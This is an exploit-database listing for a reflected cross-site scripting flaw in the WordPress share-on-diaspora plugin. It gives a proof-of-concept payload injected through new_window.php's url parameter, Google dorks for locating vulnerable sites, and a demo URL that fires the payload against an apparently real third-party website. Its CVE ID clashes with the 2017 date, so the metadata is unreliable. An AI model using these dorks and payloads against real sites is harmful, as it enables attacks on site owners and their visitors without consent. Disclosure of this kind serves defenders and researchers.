Advertisement






WordPress share-on-diaspora Plugin Cross Site Scripting (XSS)

CVE Category Price Severity
CVE-2020-13350 CWE-79 Not specified High
Author Risk Exploitation Type Date
Milad Fadavipour High Remote 2017-08-18
CPE
cpe:No specific CPE (Common Platform Enumeration) URI string provided for this exploit
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017080099

Below is a copy:

WordPress share-on-diaspora Plugin Cross Site Scripting (XSS)[+] Title: WordPress share-on-diaspora Plugin Cross Site Scripting (XSS) 
[+] Date: 2017/08/17
[+] Author: APA Golestan - GuCert
[+] Vendor Homepage: www.WordPress.org
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable File: /new_window.php
[+] Dorks : inurl:/wp-content/plugins/share-on-diaspora/new_window.php?url=

            intext:"by Share on Diaspora plugin for WordPress."

### POC:

[+] Xss Alert Code: ><svg onload=alert(/xss/)>

[+] http://site/wp-content/plugins/share-on-diaspora/new_window.php?url=><svg onload=alert(/xss/)>

### Demo:

[+] Photo: http://gucert.ir/files/2017/08/apa-1.jpg

[+] http://openlifechallenge.cc/wp-content/plugins/share-on-diaspora/new_window.php?url=%E2%80%9D%3E%3Csvg%20onload=alert(/xss/)%3E

### Credits:
[+] Gucert.ir

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum